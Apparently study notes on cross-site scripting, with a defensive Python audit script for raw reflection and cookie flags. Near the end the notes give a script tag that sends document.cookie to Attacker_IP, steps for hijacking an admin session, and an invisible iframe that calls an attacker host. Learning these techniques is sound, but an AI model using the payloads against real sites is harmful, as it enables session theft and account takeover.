special characters
<>
'
"
{}
;
If you inspect the web page and still see those raw characters reflected, it's vulnerable!
If input is not properly filtered (PHP) -> the "htmlspecialchars" function should be used to properly sanitize it; it converts key characters into HTML entities.
What's cookies and what can we do with them?
Cookies -> websites use them to track state information about users. Cookies can be set with flags that are optional, not required. We want to look for the Secure and HttpOnly flags:
- Secure flag - instructs the browser to only send the cookie over encrypted (HTTPS) connections
- HttpOnly flag - denies JavaScript access to the cookie. If it's not set, we can easily steal the cookie using an XSS.
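The two checks above (is reflected input still raw, and do session cookies carry the Secure and HttpOnly flags) as a small audit script for your own application's responses. This is an added example, not from the notes' author; the probe string, the response bodies and the Set-Cookie headers are constructed inputs, and html.escape stands in for PHP's htmlspecialchars with ENT_QUOTES.

```python
"""Audit helpers for two XSS-related checks: (1) is a probe reflected into
the page raw, or converted to entities the way PHP's htmlspecialchars() does;
(2) does a Set-Cookie header carry the Secure and HttpOnly flags."""
import html

# Characters htmlspecialchars() converts (with ENT_QUOTES): < > & " '
# '{', '}' and ';' are left alone by it, so they are not evidence on their own.
ENTITY_CHARS = set('<>&"\'')


def encode_like_htmlspecialchars(s: str) -> str:
    """Python stand-in for htmlspecialchars($s, ENT_QUOTES). html.escape emits
    &#x27; for the apostrophe where PHP emits &#039;; both are safe."""
    return html.escape(s, quote=True)


def raw_reflection(probe: str, body: str) -> list:
    """Return the entity-worthy probe characters that appear in `body`
    unencoded. Empty list = not reflected, or reflected with encoding."""
    if probe not in body:
        return []                      # probe not reflected verbatim
    return [c for c in probe if c in ENTITY_CHARS]


def cookie_audit(set_cookie: str) -> dict:
    """Parse one Set-Cookie header value and report which flags are missing."""
    parts = [p.strip() for p in set_cookie.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    missing = [f for f in ("Secure", "HttpOnly") if f.lower() not in attrs]
    return {"cookie": name, "missing": missing}


if __name__ == "__main__":
    probe = "zq<>\"'zq"                                  # constructed canary
    vulnerable_body = "<p>Hello zq<>\"'zq</p>"           # echoed back raw
    safe_body = "<p>Hello " + encode_like_htmlspecialchars(probe) + "</p>"
    print(raw_reflection(probe, vulnerable_body))        # ['<', '>', '"', "'"]
    print(raw_reflection(probe, safe_body))              # []
    # constructed headers; PHPSESSID is the session cookie named in the notes
    print(cookie_audit("PHPSESSID=abc123; Path=/"))
    print(cookie_audit("PHPSESSID=abc123; Path=/; Secure; HttpOnly"))
```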
The following script sends a GET request to the attacker's machine, forcing the victim's browser to send its cookie (PHPSESSID) along with it.
<script>new Image().src="http://Attacker_IP/cool.jpg?output="+document.cookie;</script>
When a user logs into the server, we get a callback and steal the cookie.
Use a cookie editor to add the session info and visit admin-only pages!
The OSCP book didn't cover any non-client-facing XSS.
Client-side attacks:
Invisible iframe
<iframe src=http://attacker_IP/malicious height="0" width="0"></iframe>
People who visit the site containing this invisible iframe will connect back to the attacker's machine!
(The attacker can set up a netcat listener.)